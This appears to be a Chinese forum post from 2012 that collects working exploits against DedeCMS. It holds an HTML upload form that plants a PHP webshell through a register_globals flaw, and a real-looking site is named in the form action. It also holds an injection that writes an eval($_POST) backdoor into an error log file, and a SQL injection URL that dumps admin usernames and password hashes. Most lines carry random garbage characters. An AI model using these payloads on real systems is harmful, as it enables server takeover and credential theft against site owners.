" d4 @2 @8 b1 H5 k" o' D/ F<html>
9 t T, d# P" C+ J" Z<head>3 e' H1 ~; B; e: o7 j/ @# [. z9 J
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
0 I% D* U% `# ?$ Y</head>
$ {) D& l! O+ h6 B, H1 V<body style="FONT-SIZE: 9pt">
) p$ n: P T4 b! ^+ K---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
/ @4 K: w/ f( x$ r/ C<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>$ a. o8 a) q! T4 U
<input type='hidden' name='activepath' value='/data/cache/' />
$ [0 a. Z; n5 l4 f( \<input type='hidden' name='cfg_basedir' value='../../' />6 p, e. T& A2 `9 v: e
<input type='hidden' name='cfg_imgtype' value='php' />
# N/ c( ^, z& g: @; G- R<input type='hidden' name='cfg_not_allowall' value='txt' />+ w* G2 S* F- M% K. _
<input type='hidden' name='cfg_softtype' value='php' />5 l! @! b7 k+ \ E. A
<input type='hidden' name='cfg_mediatype' value='php' />
4 m5 j$ i$ O, E<input type='hidden' name='f' value='form1.enclosure' />2 ^- @- B8 I. b; m4 Y2 `
<input type='hidden' name='job' value='upload' />; M8 }! T. i7 v6 p5 h1 s
<input type='hidden' name='newname' value='fly.php' />8 \" v1 y7 F' s' U3 A' c) N0 O/ p( i
Select U Shell <input type='file' name='uploadfile' size='25' />
, I/ ~& b* t1 b- ?9 y7 l<input type='submit' name='sb1' value='确定' />
5 @5 ]+ s4 I5 C- u7 L</form>* C: q/ k8 U2 t# u7 J, z; v
<br />It's just a exp for the bug of Dedecms V55...<br />
0 q% C* v$ c1 c, |Need register_globals = on...<br />* l6 c3 {( z! c1 }- a i
Fun the game,get a webshell at /data/cache/fly.php...<br />
( | E) A* W% y1 C6 D I</body>: l) W: V- D% E: a
</html>
& k3 Q; D4 P0 f! E2 B2 K
2 X# q0 L8 | A0 ?+ o& L: z
/ J7 O! i5 F3 ?3 N. q3 T1 V; d, E, X# H8 H7 ?
2 E5 q) X5 e# F5 `# n: Y, E% ?
# Y% _( o: E; R
) [5 q, ~( d. k" x
$ ^% ?' p. a* i; ]5 u: d6 V
4 \3 R& X: H+ O4 o, j8 n8 O
9 k# S$ b M' ~. Z H+ o+ j4 [- z& A0 s6 s9 q+ Z
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞4 E4 P/ ?5 j1 i/ a/ g
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。7 w: \3 n4 c6 w/ o3 L0 k: `
1. 访问网址:
2 p" q8 R$ _7 g4 g5 u1 a$ Shttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
, Z5 P: J& w* d4 F可看见错误信息' c! Y+ p7 P7 v; T+ v3 ~) ~# s8 P
4 O" ]7 ~% F9 e8 ~* j
! a; t: |" n. a8 J4 V: R. {. Q
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
( D, g; r/ z7 M, ?int(3) Error: Illegal double '1024e1024' value found during parsing
, {8 B: l! w* U+ pError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
5 g8 A* U: {( i" `1 [- b- T1 a9 Z5 p! s; P$ X
$ n( X6 s" C2 H1 W1 H3 v9 N% ?1 p6 c3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是; l7 q& B$ o0 G: ~6 m0 _: U$ S
+ B/ Y( O" b' |4 A5 f) O, p; I) \
8 [" { @$ {5 M) v0 P<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>+ z; r* {1 X8 \; T( E+ U5 J+ N
$ @; K% e. x0 y$ D" q- T& I8 j7 o7 [6 S# x3 ?% `' n9 g! q
按确定后的看到第2步骤的信息表示文件木马上传成功.
* Q1 v0 @2 y2 n2 w9 {# g% g {. P% R1 w) @
1 B2 T" \9 \! W3 Q
P, }$ z a" S% ^9 W! C( R2 }
1 F% M# R \ I) Q2 i& a5 b: {: t7 S. r; E5 N3 g+ O% U
9 P7 d1 y9 @# G( Q& p1 z; P
- Y* t- r! W# _. j8 P
: d( x0 X, q/ ~5 p0 N
9 ]0 H7 z, K! Q3 ~2 b
# {8 q0 P; h# p& M. r
' [% Q+ b% }: B+ |. V2 c& Y! s- D& Q0 E" g+ F
织梦(DedeCms)plus/infosearch.php 文件注入漏洞6 e+ B; s" `# h( ~& P5 G
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对